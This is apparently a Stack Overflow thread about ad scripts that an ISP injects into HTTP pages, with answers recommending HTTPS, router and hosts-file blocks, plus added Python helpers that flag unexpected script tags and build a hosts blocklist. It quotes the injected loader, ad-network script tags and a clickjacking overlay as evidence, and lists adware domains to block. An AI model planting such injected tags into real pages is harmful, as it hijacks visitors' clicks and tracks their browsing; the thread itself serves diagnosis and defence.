Unknown scripts are running and redirecting on click to unknown websites
Problem: Sometimes, on clicking a NAVBAR menu item or any div on my Bootstrap website, it redirects to ads or unknown links in a new tab, something like this.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from the hosted file:

    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

    <link rel="stylesheet" type="text/css" href="css/style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

    <script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap"></script>

What I got in Inspection:

I checked my code multiple times when there was no redirect on clicking the menu. I found nothing suspicious... BUT THEN, when I got redirect links on click, I checked my code in the browser and I can clearly see a few script sources added to my files (visible in Inspect mode in browsers only). They are not written in my code. The unknown parts of my code are:

1) HERE: the following 2 scripts are replacing the script js/jquery.min.js in the head tag

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to the body tag right after I import the Google API

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript"></script>
</span>

3) This one is also in the body tag.

<div class="pxdouz70egp12" style='left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000;'></div>

4) On inspecting the redirect link, the HEADERS info:

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:

My code is clean and there is no script which redirects it anywhere. It may be my browser or Windows being compromised. I checked the website from 3 browsers (EDGE, CHROME, FIREFOX) and got the same problem. Then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support if the server is compromised; they replied it's okay from their end. I installed Malwarebytes and all sorts of software to solve it, but they just notify that Chrome / Firefox / Edge is redirecting to an outbound ID with some domain name, mostly go.oclasrv.com, and do nothing.

**ANY SOLUTION???**

UPDATE:

I got a similar redirect on the Hostgator support feedback link.

On noticing, here the domain name in the string is replaced by rateus.in; zoneid=1492761 is the same whatever unsecure link I open. Also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx change for different links, and fingerprint=c2VwLW5vLXJlZGlyZWN0 is the same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to WIN10 Pro and I have installed only Chrome without any plugins...

The problem is browser independent, as I got the same results on EDGE and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

Displace answered 27/6, 2018 at 14:7 Comment(5)
Sounds like a virus or JS injection. Not much we can do about that.Coveney
This may or may not help, but can you try serving your site over HTTPS? It would help determine where along the transport of your content the tampering is occurring.Crapshooter
It happens due to BSNL injecting their ad scripts when the HTTP request is an unsecured one. You can add an IP Security policy on your local machine/domain systems following this post davidsekar.com/misc/block-bsnl-ads-using-ipsecEvanevander
Similar complaints reported at reddit.com/r/india/comments/8wj6ec/…Sholem
BSNL n/w is the real culprit..Auntie
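The question shows two kinds of evidence a site owner can use to confirm injection rather than a bug in their own code: `<script src>` tags that are not in the file they uploaded, and a loader URL (`.../getjs?nadipdata=...`) whose query string carries data about the page being visited. The following is an added example (not code from the question or from any of the answers) that does both checks offline: it collects every script source from a captured copy of the served HTML, flags any that is not on the author's allow-list, and decodes the `nadipdata` JSON and the base64 `fingerprint` value of the loader so you can see what the injector recorded. The allow-list is taken from the question's import block; the `site_host` argument and the sample HTML are constructed assumptions for the example.

```python
import base64
import json
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# <script src> values the site author actually wrote (taken from the question's import list).
EXPECTED_SCRIPT_SRCS = {
    "js/jquery.min.js",
    "js/main.js",
    "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js",
}

# Constructed sample: the author's page as the browser received it, with the
# injected tags the question shows (copied verbatim, &amp; entities included).
SAMPLE_HTML = """
<head>
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
<span id="notiMain"><script src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>
</body>
"""


class ScriptCollector(HTMLParser):
    """Collect the src of every <script> tag; HTMLParser unescapes &amp; for us."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def is_expected(src, expected, site_host):
    """True if src is one of the author's own tags, compared by path (same host) or exactly (CDN)."""
    parts = urlsplit(src)
    if parts.query:                      # the author's tags carry no query string
        return False
    if parts.netloc and parts.netloc != site_host:
        return src in expected           # third-party script must match the allow-list exactly
    return parts.path.lstrip("/") in expected


def find_unexpected_scripts(document, site_host, expected=EXPECTED_SCRIPT_SRCS):
    """Return every script source in the document that is not on the allow-list."""
    collector = ScriptCollector()
    collector.feed(document)
    return [s for s in collector.srcs if not is_expected(s, expected, site_host)]


def decode_getjs(src):
    """Unpack the query string of a .../getjs?nadipdata=... loader to show what it carried."""
    parts = urlsplit(src)
    query = parse_qs(parts.query)        # percent-decodes %7B, %22, %2F ... for us

    def first(key):
        return query.get(key, [None])[0]

    raw = (first("nadipdata") or "").strip('"')   # value is a JSON object wrapped in quotes
    info = json.loads(raw) if raw else {}
    fp = first("fingerprint")
    try:
        fingerprint = base64.b64decode(fp).decode("ascii") if fp else None
    except (ValueError, UnicodeDecodeError):
        fingerprint = fp                 # not base64: keep the raw token
    return {
        "injector": parts.netloc,
        "page_url": info.get("url"),
        "referer": info.get("referer"),
        "host": info.get("host"),
        "screen": (first("screenwidth"), first("screenheight")),
        "fingerprint": fingerprint,
    }


if __name__ == "__main__":
    for src in find_unexpected_scripts(SAMPLE_HTML, "amans.xyz"):
        print("UNEXPECTED:", src[:80])
        if "/getjs?" in src:
            print("  loader payload:", decode_getjs(src))
```

Run the script against a copy of the page saved from the browser's Inspect view (the only place the injected tags are visible, as the question notes), not against the file on the server, which is unchanged. Anything the allow-list check reports is content that was added in transit or on the server, and the decoded loader payload shows that the injector recorded the requested path, the referer, the host and the screen size of the visitor, which is the evidence to attach to a complaint to the ISP.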
15

This seems to be a case of the ISP injecting JavaScript files. Are you by any chance on BSNL broadband? For the last few days, BSNL seems to be injecting adware on HTTP (non-encrypted) sites.

The only solution I know is to host your site on HTTPS OR change your ISP.

Melmela answered 2/7, 2018 at 0:37 Comment(10)
Yes. This is happening on BSNL broadband and BSNL mobile. They are injecting adware on HTTP traffic, intercepting it and pushing JavaScript files.Melmela
I am also using BSNL and this is happening across all my devices (desktop, mobile phones, etc.) on non-HTTPS sites. A very poor way for an ISP to make money. I reached this page by searching BSNL and cobalten.Maccarone
The only solution is to raise a grievance request on BSNL portal letting them know that this is a really bad way. Some of the links are pointing to really shady websites.Melmela
same issue hereUnderclay
You can also block requests to 117.240.205.115:3000 via your router until BSNL resolves this issue from their end. I did the same on my D-LINK router. But do report this issue via a grievance and on Twitter.Dymoke
From this page quora.com/What-is-cobalten-com-redirect-virus If using chrome go to chrome://settings/content/javascript and under “Block” section add [*.]cobalten.com . This stopped the pop ups, on my BSNL broadband and mobile data.Streaky
Is it BSNL or some bad BSNL employee?Impute
It could well be a corrupt employee. I am seeing that sometimes it is even forwarding to very nasty websites.Melmela
This is definitely coming from the BSNL network only. And it affects (and can only affect) non-secure sites. Want to add: use HTTPS anyway, because Google might end up flagging your website as bad because of a script injected by BSNL. Set up Cloudflare and HTTPS redirects using Cloudflare.Margrettmarguerie
It is not necessarily your hosting. If you visit any website on any server and the site is non-HTTPS, your clicks are getting hijacked. Does this mean that you don't browse any non-HTTPS site?Prosser
1

This issue that you are having is server-side. Likely nothing is wrong with your code; however, the server is infected with malware injecting this bad code into your website.

To solve this, I would make a backup of the code you wrote, change your FTP hosting passwords, erase your server, and add your code back. If this does not solve the problem, then I would change hosting providers.

Impermanent answered 27/6, 2018 at 14:17 Comment(8)
Currently I am on a shared hosting plan on Hostgator. As it's a static website, I can't afford a dedicated server for a static website. I can add an SSL certificate to the domain but don't know if that will solve my problem. Hostgator support was pathetic for the same; their words were "what you want me to do".Displace
Also, do protection add-ons like Sitelock Malware Protector on Hostgator even work to prevent malware attacks? OR, I am guessing they are intentionally infecting shared hosting to sell their add-ons... Any better malware-free shared host provider with the best uptime for the Canada region?Displace
I would recommend making a backup of all of your code that you know is free from malware, then deleting all files on the server that you have access to. Then change all passwords (make them complex), then add your files back. Did you try this?Impermanent
That's the next step I will do. BUT today when I contacted Hostgator and shared the code and all, they also said to change the passwords of all logins. And when I got the feedback window for Hostgator support, I got the same redirect link when I clicked on ratings: <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script> I didn't even install anything else on my fresh Win10 system except Chrome. I even got this problem on the preinstalled EDGE before installing Chrome. Isn't it weird, or is anything wrong??????Displace
Have you been able to test this on another computer?Impermanent
I got exactly the same issue on my website hosted on shared GoDaddy hostingUndercroft
My blog is on WordPress; is it due to some plugin?Undercroft
Seems like some new malwareUndercroft
0

If you see an unknown script injected from the following IPs, then it is a script file injected by the BSNL ISP.

61.0.245.90, 117.205.13.171

These scripts are injected only when you visit HTTP websites. HTTPS involves Transport Layer Security, so it cannot be tampered with by the ISP.

The script files from these IPs are just a conduit, which downloads further ad scripts from different ad networks. Most of these ad networks follow intrusive advertising by hijacking user mouse clicks to open their popups.

BSNL's excuse for such activity is that it is a feature to enhance the browsing experience for their subscribers. There is a detailed post written on BSNL injecting such scripts and how to stop them.

Evanevander answered 24/10, 2018 at 2:50 Comment(0)
0

Good Catch!

BSNL servers have been getting corrupted or infected with malware/viruses day by day due to poor security.

There was naganoadigei.com, which was registered explicitly to serve malware and redirect users to phishing sites.

Recently, in February 2019, they resolved the issue. But unfortunately a new type of ad-based redirect was found, humparsi.com, as of February 2019.

You may have a look at whether the site has been infected or not by visiting Sucuri.

Alternatively, you can block the outgoing requests from your standalone system with DNS entries.

Navigate to %windir%\System32\drivers\etc, edit the hosts file in elevated mode / with Admin authorization, and add these lines to your hosts file:

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL.

To block a specific IP address, block outbound connections to it in the firewall.

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing add-ons such as NoScript or ScriptSafe, and HTTPS Everywhere.

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob
Col answered 11/4, 2019 at 12:19 Comment(8)
And now it's redirecting me via xalabazar.comYuki
Just protect your browser fingerprint. Will you tell me which websites it's going to redirect to via xalabazar.com? Is it happening from the broadband connection or not? I just need to confirm the same via BSNL SIM @UdayrajDeshmukhHarpy
I've checked it on a BSNL broadband connection. I believe it is happening on every HTTP website at random intervals by clickjacking. Try on this link; you may need to reload and click a button for about 5 minutes to confirmYuki
Found the script with URL: Be aware before clicking this link, since it would leak all your browsing information to this IP 117.254.84.212. It is not going to work on BSNL SIM data.Harpy
The reason was "Ping request could not find host xalabazar.com. Please check the name and try again." on the BSNL SIM data network; only via BSNL Broadband @UdayrajDeshmukhHarpy
Yes, I know about that script from the blog post shared in the other answer here. I was just informing that they might just be changing the URL from humparsi.com to xalabazar.com, and now it's preskalyn.com.Yuki
Here you can see the screenshots Link1 and Link2. I have updated the list of infected sites; if you find any more, include them by editing the post @UdayrajDeshmukhHarpy
Here the script is being injected into /wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp. You can find the getjs() routes via the method loaded from the Node.js getjs Link, getting our IP address from the BSNL SIM / any other ISP @UdayrajDeshmukhHarpy
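The answer above blocks the ad domains through the Windows hosts file, and its comments show the domain list changing over time (humparsi.com, then xalabazar.com, then preskalyn.com), so the list has to be re-applied repeatedly without producing duplicate entries. The following is an added example (not code from the answer or its comments) that builds the sink entries for the answer's domain list, merges them idempotently into existing hosts-file text, and checks which names such entries actually cover. The `MARKER` comment tag and the sample hosts content are constructed for the example; the domain list is the one given in the answer.

```python
# Domains listed in the answer above; all are sunk to 0.0.0.0 as the answer does.
BLOCKED_DOMAINS = [
    "preskalyn.com", "xalabazar.com", "humparsi.com", "naganoadigei.com",
    "cobalten.com", "rateus.co.in", "go.oclasrv.com", "onclickmax.com",
    "bsnl.phozeca.com", "phozeca.com", "c.phozeca.com",
]
# Hypothetical trailing comment so the managed lines can be recognised later.
MARKER = "# isp-adware-blocklist"

# Constructed sample of an existing Windows hosts file with one entry added by hand.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
0.0.0.0 cobalten.com   # added by hand last week
"""


def parse_hosts(text):
    """Return {hostname: ip} for every non-comment entry in hosts-file text."""
    entries = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:                      # one line may list several names
            entries[name.lower()] = ip
    return entries


def merge_blocklist(existing, domains=BLOCKED_DOMAINS, sink="0.0.0.0"):
    """Append a sink entry for each domain not already present; running it twice changes nothing."""
    present = parse_hosts(existing)
    new_lines = [f"{sink} {d} {MARKER}" for d in domains if d.lower() not in present]
    if not new_lines:
        return existing
    body = existing.rstrip("\n")
    return (body + "\n" if body else "") + "\n".join(new_lines) + "\n"


def is_blocked(hostname, hosts_text, sink="0.0.0.0"):
    """hosts(5) matches exact names only: a sub-domain of a blocked name is NOT covered."""
    return parse_hosts(hosts_text).get(hostname.lower()) == sink


if __name__ == "__main__":
    merged = merge_blocklist(SAMPLE_HOSTS)
    print(merged)
    for name in ("go.oclasrv.com", "c.phozeca.com", "x.phozeca.com"):
        print(f"{name}: {'blocked' if is_blocked(name, merged) else 'NOT blocked'}")
```

The exact-match check is the caveat worth knowing before relying on this: the answer lists phozeca.com, bsnl.phozeca.com and c.phozeca.com as three separate lines precisely because a hosts entry for the parent domain does nothing for its sub-domains, unlike the `[*.]cobalten.com` pattern that Chrome's per-site JavaScript setting accepts (mentioned in a comment on another answer). To apply the output on Windows, write `merged` back to `%windir%\System32\drivers\etc\hosts` from an elevated prompt, as the answer describes.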
0

Simply block the URL (the BSNL IP injecting these ads) from your router's security section. For me the BSNL URL was http://117.254.84.212

Arnhem answered 8/10, 2020 at 13:56 Comment(0)
0

Adguard has fixed this, as referenced here, to block the clickjacking. The script can be seen in action in mobile browsers, opening new-tab advertisements.

Update your Adguard filters to the latest version to see.

Pungent answered 29/10, 2020 at 0:26 Comment(0)
0

Blocking this URL http://117.254.84.212:3000 seems more effective

In Router

Ifill answered 11/1, 2022 at 5:59 Comment(0)